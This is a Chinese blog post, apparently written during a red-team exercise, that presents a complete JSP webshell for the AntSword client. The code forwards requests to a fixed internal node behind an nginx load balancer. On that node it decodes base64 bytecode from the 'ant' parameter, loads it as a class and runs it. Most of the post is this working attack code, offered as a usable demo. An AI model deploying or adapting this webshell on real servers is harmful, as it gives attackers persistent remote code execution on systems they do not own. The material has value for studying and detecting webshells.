护网太无聊了 找点事情干
下午没事干研究了下这篇文章
https://mp.weixin.qq.com/s/4Bmz_fuu0yrLMK1oBKKtRA
核心思路是如果负载均衡场景下 nginx后面的几个节点可以互相访问的话 可以把流量全都转发到同一个节点上来搞事情 用一个午休的时间自己写了个小demo 效果还是能用的

蚁剑自带的一句话非常简单 只需要维护ant一个参数 所以不需要写一个完整的http代理 只需要转发ant参数给固定ipport就行了

代码如下

<%@ page import="java.net.MalformedURLException" %>
<%@ page import="java.net.URLConnection" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.io.*" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.util.Enumeration" %>
<%@ page import="java.net.URLEncoder" %>
<%!
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
    public String base64Encode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Encoder");
            return (String) clazz.getMethod("encode",byte[].class).invoke(clazz.newInstance(),str.getBytes());
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object encoder =clazz.getMethod("getEncoder").invoke(null);
            return (String) encoder.getClass().getMethod("encodeToString", byte[].class).invoke(encoder, str.getBytes());
        }
    }
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    class Connection{
        public final static  String targetIp = "172.19.0.3";
        public final static  String targetPort = "8080";
        public String path;
        public String protocol;
        public HttpServletRequest request;
        public Connection(HttpServletRequest request){
            this.request = request;
            this.path =   request.getRequestURI();
        }
        public String postAnt(String ant) throws IOException {
            //java.net.URL url = new java.net.URL("http://"+this.targetIp+":"+this.targetPort+path);
            java.net.URL url = new java.net.URL("http://"+this.targetIp+":"+this.targetPort+path);
            PrintWriter out = null;

            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod("POST");
            connection.setRequestProperty("Connection", "Keep-Alive");
            connection.setUseCaches(false);
            connection.setDoOutput(true);
            connection.setDoInput(true);
            connection.connect();
            out = new PrintWriter(connection.getOutputStream());
            out.print(ant);
            out.flush();
            BufferedReader in = null;
            in = new BufferedReader(new InputStreamReader(connection.getInputStream(), "UTF-8"));
            String result = "";
            String getLine;
            while ((getLine = in.readLine()) != null) {
                result += getLine+"\n";
            }
            in.close();
            return result;
        }
    }
%>
<%
    String params = "";
    Enumeration pNames=request.getParameterNames();
    while(pNames.hasMoreElements()){
        String name=(String)pNames.nextElement();
        String value=request.getParameter(name);
        params += name + "=" + URLEncoder.encode( value, "UTF-8")+"&";
    }
    params += "Author=P3rh4ps";
    if(!request.getLocalAddr().equals(Connection.targetIp)) {
        out.println(new Connection(request).postAnt(params));
    }else {
        String cls = request.getParameter("ant");
        if (cls != null) {
            new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
        }
    }
%>
Categories: 技术

0 Comments

发表评论

Avatar placeholder

您的电子邮箱地址不会被公开。 必填项已用*标注